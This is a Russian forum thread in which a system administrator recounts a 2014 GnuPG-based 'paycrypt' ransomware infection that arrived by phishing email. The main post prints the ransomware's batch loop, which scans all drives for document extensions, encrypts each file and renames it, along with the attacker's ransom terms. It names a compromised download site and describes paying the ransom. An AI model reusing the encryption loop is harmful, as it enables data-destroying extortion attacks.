Зашифровали файлы. Мошенничество.⁠⁠

такие важные данные и без бэкапа... хм, а ты в курсе, что жесткие диски бывает сами ложатся, без всяких кибертеррористов?

Так вы мне один киньте, я у себя на виртуалке попробую) Если получится отправлю вам расшифрованный бесплатно)) с чем черт не шутит. только программу для дешифровки тоже киньте, не осталось сего добра

с одного из форумов:
У нас заразился только один компьютер (увы, главбуха, где была вся важная инфа).
Жалко что лечения пока нету. И платить не хочется...

Частично решили проблему откатом системы на 2 дня, до точки заражения.
Win7, восстановление предыдущих версий файлов чтобы не е**ться с дешифровкой.


Оплата вымогателям, оказывается, через биткоины - концов не найдешь.


Делюсь своим печальным опытом борьбы с этой заразой.
По сценарию: Письмо, надо заметить, от доверенного респондента, с темой "Акт сверки".
Обычный пользователь, среднестатистический я бы даже сказал, не в жизть не посмотрит, что там за расширение у присланного файла. В моем случае архив, в архиве скрипт. В результате утренний звонок с работы - АВРАЛ!!!
В общем день и ночь работы этой хрени(paycrypt@gmail_com), стоила конторе потери более 200 тыс всяких разных офисных и архивных файлов.
Заспанным глазом взглянув на файлы, опознался пользователь, с компа которого было произведено это варварство. После чего была дана команда комп от сети отрубить. Часть пропажи восстановлена из архива, но кой чего в архивах не было, и в общем-то, надо признать, дофига чего еще не было. Почитав соответствующие форумы вырисовалась печальная картина: придется платить sad.gif Вступили в неспешную переписку с афтором(ами), хрен их знает, может я вообще с ботом переписывался smile.gif, параллельно пытаясь восстановить потерянное всякими R-Studi'ями и GoDataBack'ами. Ответили довольно быстро, уточняли точное количество файлов,
QUOTE
стоимость дешифровки составляет 150 евро до 4000 файлов.
Все что более считайте по коэф. 0.037 евро за 1 файл.
Если брать дешифратор по количеству, будет стоять жесткое ограничение
на кол-во дешифрованых файлов. Дешифратор запускается один раз с
обращением на внешний сервер.
Астрономичность суммы в моем случае зашкаливала, но лиха беда начало.
Решил разобрать все таки что это за хрень. Комп , слава богу был выключен до завершения процесса окончательного превращения нашей скромной конторы в ничто, а стало быть таинство вышеозначенного превращения должно было оставить некие следы, кои и были найдены.
Шифруется все это дело с помощью опенсорс программулины GnuPG, скрипт с взломанного сайта, кстати http://www.russmebelspb.com/, загружает несколько файлов, а именно:
1После чего cmd файл и запускается. Вкратце: генерится ключ, после чего сканируются диски на предмет наличия файлов (xls *.xlsx *.doc *.docx *.pdf *.jpg *.cd *.jpeg *.1cd *.rar *.mdb *.zip). Диски сканируются все, просто перебором английского алфавита. вывод сканирования идет в файл
CODE
if exist C:\*.* for /r "C:\" %%i IN (*.xls *.xlsx *.doc *.docx *.pdf *.jpg *.cd *.jpeg *.1cd *.rar *.mdb *.zip) do (echo %WIND% -r paycrypt --yes --trust-model always --no-verbose -q --encrypt-files "%%i" ^& move /y "%%i.gpg" "%%i" ^& RENAME "%%~fi" "%%~ni%%~xi.%PYCONNECT%@gmail_com">> "%TEMP%\cptbase.bin")
что на выходе дает команду
CODE
svchost.exe -r paycrypt --yes --trust-model always --no-verbose -q --encrypt-files "C:\Users\Username\Desktop\23 февраля Эдельвейс\Документ Microsoft Word.docx" & move /y "C:\Users\Username\Desktop\23 февраля Эдельвейс\Документ Microsoft Word.docx.gpg" "C:\Users\FUsername\Desktop\23 февраля Эдельвейс\Документ Microsoft Word.docx" & RENAME "C:\Users\Username\Desktop\23 февраля Эдельвейс\Документ Microsoft Word.docx" "Документ Microsoft Word.docx.paycrypt@gmail_com"
Опосля чего все исходники самоудаляются, оставив на память о себе только письмо счастья, файл PRIVATE.KEY и DECODE.ZIP (архив с дешифровщиком[внутри самораспаковывающийся архив с cmd-файлом обратного назначения]).
Отчаяный шаг установки виндоверсии GnuPG (pgp4win - если кому интересно) показал наличие открытого ключа, того самого PRIVATE.KEY, попытки использовать программы восстановления данных для возврата закрытого ключа, тоже успехом не увенчались. Видимо сказывается специфика работы командного файла, ибо операций записи, после удаления файла происходило до черта.
Выводы на это время: - ключ у злоумышленника есть (отосланные ему зашифрованные файлы были возвернуты в читабельном состоянии), ключ не зависит, от количества файлов зашифрованных эти колючем. Так что ....Все что более считайте по коэф. 0.037 евро за 1 файл - это очередной развод.
Решились обходится малой кровью - заплатили оговоренные 150 евро. Ключ был прислан к вечеру, запущен дешифратор на виртуалке со скопированными файлами и ...... барабанная дробь....ПШШШИК!!!!
Ни-хе-ра.
Файлы переименовались в gpg - родное расширение для GnuPG, и все.
Дальше началась типичная переписка с техподдержкой. Однако, техподдержка у вируса.... маразм какой то. smile.gif
На все наши уверения, что ключ кривой, что видно если из коммандной строки запустить тот самый дешифратор
CODE
decrypt.exe --import "UNCRYPT.KEY"
gpg: keyring `C:/Documents and Settings/Lфьшэ/Application Data/gnupg\secring.gpg' created
gpg: keyring `C:/Documents and Settings/Lфьшэ/Application Data/gnupg\pubring.gpg' created
gpg: key IDKEY008: secret key imported

echo paycrypt | decrypt.exe --batch --passphrase-fd 0 --no-verbose --decrypt-files "C:\Documents and Settings\Username\Мои документы\Microsoft Word.docx.gpg"
>gpg: encrypted with RSA key, ID IDKEY004
>gpg: decryption failed: secret key not available

ID ключа я здесь не привожу, но не тот это был ключ которым шифровали мои документы... там даже дата создания ключа была месяцем раньше, чем дата заражения
В общем неделя ушла на убеждения, что с ключом ошибка вышла. Чувак упорно не слушал доводов о левизне ключа и присылал какие-то новые версии дешифраторов. Взывания к совести тут были бы бесполезны но решили ударить по-больному, т.е. опозорить "ЧЕСТНОЕ ИМЯ", мол на антивирусных форумах пропишем, что ты кидала, деньги берешь, а результата - ноль. Сей ж момент был прислан другой ключ.
Дешифратор использовал gpg4win, как то больше к нему доверия. Файлы восстановились.

Резюме:
На данный момент сайт http://www.russmebelspb.com/ блокируется почти всеми антивирусами, но я не думаю, что это последний взломанный сайт в этом мире.
Антивирус подобную заразу не поймает, в коде нет ничего криминального с точки зрения системы защиты.
Злоумышленник, в общем-то , в меру честен, окромя случая развода на бабло исходя из количества файлов (берем с него пример, не признавайтесь что стопицот файлов похерено)
Если комп выключить очень быстро...ну очень-очень быстро, а не как в моем случае - сутки спустя, то можно даже поймать неотправленный ключ.
Ну и ...есть админы, которые уже делают бэкапы, а есть, которые еще не делают, меня перевели в другую категорию, правда не бесплатно.

P.S. у меня есть чей то чужой ключ - может кому пригодится.

This post has been edited by imalazyman: 15.07.2014 23:58

На любой обменник. зашифрованный файл и unlock.exe или типо того

Поэтому я на маке

Шифровальщики создают новые зашифрованные файлы. Старые файлы просто удаляются. При помощи програмулек типа GetData Recover My Files всё прекрасно восстанавливается ;)

но однозначно пока что только платить, ибо лекарств пока нет.